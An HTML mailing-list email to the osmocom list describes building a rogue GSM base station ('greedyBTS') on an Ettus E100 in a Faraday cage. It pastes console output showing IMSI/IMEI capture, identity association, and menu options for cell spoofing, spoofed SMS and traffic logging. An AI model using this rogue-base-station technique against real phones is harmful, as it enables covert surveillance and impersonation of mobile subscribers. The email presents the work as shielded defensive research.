<div dir="ltr"><div class=""><img class="" id=":1ak" src="https://mail.google.com/mail/u/0/images/cleardot.gif" alt="">Hi all,</div><span style="font-family:arial,sans-serif;font-size:12.8px"></span><div style="font-family:arial,sans-serif;font-size:12.8px">
My first attempt to send this email didn't appear to succeed so I am re-sending without attachment. Here is a copy of some slides <a href="https://github.com/HackerFantastic/Public/blob/master/presentations/mwri_labs-GSM-Hacking-Wireless-Mobile-Phone-Communication_2014-01-30.pdf">https://github.com/HackerFantastic/Public/blob/master/presentations/mwri_labs-GSM-Hacking-Wireless-Mobile-Phone-Communication_2014-01-30.pdf</a> I wrote for a presentation on
security weaknesses within GSM. I used an Ettus E100 to develop a
malicious BTS and GSM related attacks in a Faraday cage and presented on
how these attacks work to better understand them for defensive
purposes. I was able to use the E100 as a generic IP-router after I
cross-compiled a new kernel with netfilter enabled and also I had to
recompile a number of the packages such as Asterisk to enable ODBC and
improved SQLite support, I also had to make some changes to Python and
its modules. I used GNURadio 3.6.4 and I had to compile a specific
version of the OpenBTS code as the recent transceiver application did
not function with the E100. I was able to get the E100 to work as a
GSM/GPRS router and do real-time call placement etc. I got it to
function with real-time support and wrote a small script to provision
new devices by watching the syslog and adding to the SQLite database.</div>
<div style="font-family:arial,sans-serif;font-size:12.8px"><br></div><div style="font-family:arial,sans-serif;font-size:12.8px">I
also used osmocom-bb to do things like use gnuplot and graph the
channel usage although the code is extremely ugly! I took RSSI
measurements over a period of time into images and then tied them
together for a movie, it isn't quite realtime but it makes pretty
graphs. I mentioned how you could implement the MS side of the GSM stack
using the osmocom project and as such am sharing the slides with the osmocom list. </div>
<div style="font-family:arial,sans-serif;font-size:12.8px"><br></div><div style="font-family:arial,sans-serif;font-size:12.8px">Just
goes to show how mighty things come in small packages! Hope this
material is useful to others on the list who may also be trying similar
experiments. I ended up creating a firmware image that could be used to
dd and boot an E100 but at this time I do not plan on hosting it for
download unless there is sufficient interest. If you need it for some
reason drop me an e-mail. </div>
<div style="font-family:arial,sans-serif;font-size:12.8px"><br></div><div style="font-family:arial,sans-serif;font-size:12.8px">Here is an example of the output of the greedyBTS script. As an example my code plays "Rick Astley - never going to give you up" when a user places a phone call and they have been provisioned with service. All of this work was done in a faraday cage which I obtained from Ramsey electronics which had very good frequency attenuation graph from 0mhz all the way to 1ghz.<br>
<br><div>root@usrp-e1xx:~# ./launch.sh </div><div>Launching asterisk</div><div>Launching HLR SMS</div><div>Launching OpenBTS</div><div>Launching Greedy BTS..</div><div><br></div><div> 888 888 d8 </div>
<div> e88 888 888,8, ,e e, ,e e, e88 888 Y8b Y888P 888 88e d88 dP"Y </div><div>d888 888 888 " d88 88b d88 88b d888 888 Y8b Y8P 888 888b d88888 C88b </div><div>Y888 888 888 888 , 888 , Y888 888 Y8b Y 888 888P 888 Y88D </div>
<div> "88 888 888 "YeeP" "YeeP" "88 888 888 888 88" 888 d,dP </div><div> , 88P 888 pDK++ </div><div> "8",P" 888 </div>
<div><br></div><div> </div><div>[+] Current CELL configuration</div><div>[-] ==========================</div><div>[-] Shortname: 'Noone'</div><div>[-] MCC: 901 MNC: 70 C0 ARFCN: 51</div><div>[-] LAC: 3336 ARFCN's: 1 BAND: 900</div>
<div>[-] </div><div>[-] Radio Power</div><div>[-] ===========</div><div>[-] RxGain: 47 MaxPower: 10 MinPower: 0 </div><div>--> help </div>
<div>[+] HELP SCREEN </div><div>[-] dump imei - lists all identified IMEI </div><div>[-] dump assoc - lists all IMEI+IMSI associations </div>
<div>[-] dump imsi - lists all identified IMSI </div><div>[-] dump save - store a record of all identities </div><div>[-] start service - provide service to IMSI & log traffic </div>
<div>[-] show service - show all provisioned phones </div><div>[-] stop service - deletes an identified IMSI from HLR </div><div>[-] calls - provide call collection statistics </div>
<div>[-] sms - provide sms collection statistics </div><div>[!] gprs - provide gprs collection statistics </div><div>[-] cellconfig - configure cell parameters for spoofing </div>
<div>[-] cellinfo - dump information on current cell </div><div>[-] cellshow - list short codes for common cells </div><div>[!] sounddial - play a sound recording to an IMSI </div>
<div>[!] spoofsms - send a spoof SMS message to an IMSI </div><div>[!] trunksetup - display current SIP trunk details </div><div>[-] verbose - turn on real time tracing </div>
<div>[-] exit - leave without shutdown </div><div>[-] shutdown - bye! </div><div>--> dump imei </div>
<div>[+] Dumping seen handset IMEI </div><div>[-] 1: IMEI359209002648230 </div><div>[-] 2: IMEI358622002760070 </div>
<div>[-] 3: IMEI350694801239040 </div><div>[-] Total IMEI identified 3 </div><div>--> dump imsi </div>
<div>[+] Dumping IMSI capture results </div><div>[-] 1: IMSI901700000002484 </div><div>[-] 2: IMSI901700000002486 </div>
<div>[-] 3: IMSI901700000002488 </div><div>[-] Total IMSI identified 3 </div><div>--> dump assoc </div>
<div>[+] Dumping IMSI/IMEI association </div><div>[-] 1 IMEI:358622002760070 used IMSI901700000002486 </div><div>[-] 2 IMEI:350694801239040 used IMSI901700000002488 </div>
<div>[-] Total associations 2 </div><div>--> show service </div><div>[+] Displaying all provisioned IMSI </div>
<div>[-] 1: exten: 2100 user: IMSI001010000000000 </div><div>[-] 2: exten: 2339 user: IMSI901700000002484 </div><div>[-] Total subscriber count 2 </div>
<div>--> stop service </div><div>[+] Deleting IMSI from HLR </div><div>[-] Enter IMSI: IMSI901700000002484 </div>
<div>[-] Deleted IMSI901700000002484 </div><div>--> help </div><div>[+] HELP SCREEN </div>
<div>[-] dump imei - lists all identified IMEI </div><div>[-] dump assoc - lists all IMEI+IMSI associations </div><div>[-] dump imsi - lists all identified IMSI </div>
<div>[-] dump save - store a record of all identities </div><div>[-] start service - provide service to IMSI & log traffic </div><div>[-] show service - show all provisioned phones </div>
<div>[-] stop service - deletes an identified IMSI from HLR </div><div>[-] calls - provide call collection statistics </div><div>[-] sms - provide sms collection statistics </div>
<div>[!] gprs - provide gprs collection statistics </div><div>[-] cellconfig - configure cell parameters for spoofing </div><div>[-] cellinfo - dump information on current cell </div>
<div>[-] cellshow - list short codes for common cells </div><div>[!] sounddial - play a sound recording to an IMSI </div><div>[!] spoofsms - send a spoof SMS message to an IMSI </div>
<div>[!] trunksetup - display current SIP trunk details </div><div>[-] verbose - turn on real time tracing </div><div>[-] exit - leave without shutdown </div>
<div>[-] shutdown - bye! </div><div>--> dump imei </div><div>[+] Dumping seen handset IMEI </div>
<div>[-] 1: IMEI359209002648230 </div><div>[-] 2: IMEI358622002760070 </div><div>[-] 3: IMEI350694801239040 </div>
<div>[-] Total IMEI identified 3 </div><div>--> dump imsi </div><div>[+] Dumping IMSI capture results </div>
<div>[-] 1: IMSI901700000002484 </div><div>[-] 2: IMSI901700000002486 </div><div>[-] 3: IMSI901700000002488 </div>
<div>[-] Total IMSI identified 3 </div><div>--> dump assoc </div><div>[+] Dumping IMSI/IMEI association </div>
<div>[-] 1 IMEI:358622002760070 used IMSI901700000002486 </div><div>[-] 2 IMEI:350694801239040 used IMSI901700000002488 </div><div>[-] Total associations 2 </div>
<div>--> dump save </div><div>[+] Saving IMSI capture results </div><div>[+] Saving seen handset IMEI </div>
<div>[+] Saving IMSI/IMEI association </div><div>[-] logfile stored as 'greedybts.log' </div><div>--> shutdown </div>
<div>root@usrp-e1xx:~# cat greedybts.log </div><div>[-] 1: IMSI901700000002484 </div><div>[-] 2: IMSI901700000002486 </div>
<div>[-] 3: IMSI901700000002488 </div><div>[-] Total IMSI identified 3 </div><div>[-] 1: IMEI359209002648230 </div>
<div>[-] 2: IMEI358622002760070 </div><div>[-] 3: IMEI350694801239040 </div><div>[-] Total IMEI identified 3 </div>
<div>[-] 1 IMEI:358622002760070 used IMSI901700000002486 </div><div>[-] 2 IMEI:350694801239040 used IMSI901700000002488 </div>[-] Total associations 2<br></div><div style="font-family:arial,sans-serif;font-size:12.8px">
<br><br></div><div style="font-family:arial,sans-serif;font-size:12.8px">Kind Regards,</div><div style="font-family:arial,sans-serif;font-size:12.8px">
Matthew</div><br><br><br><br>
</div>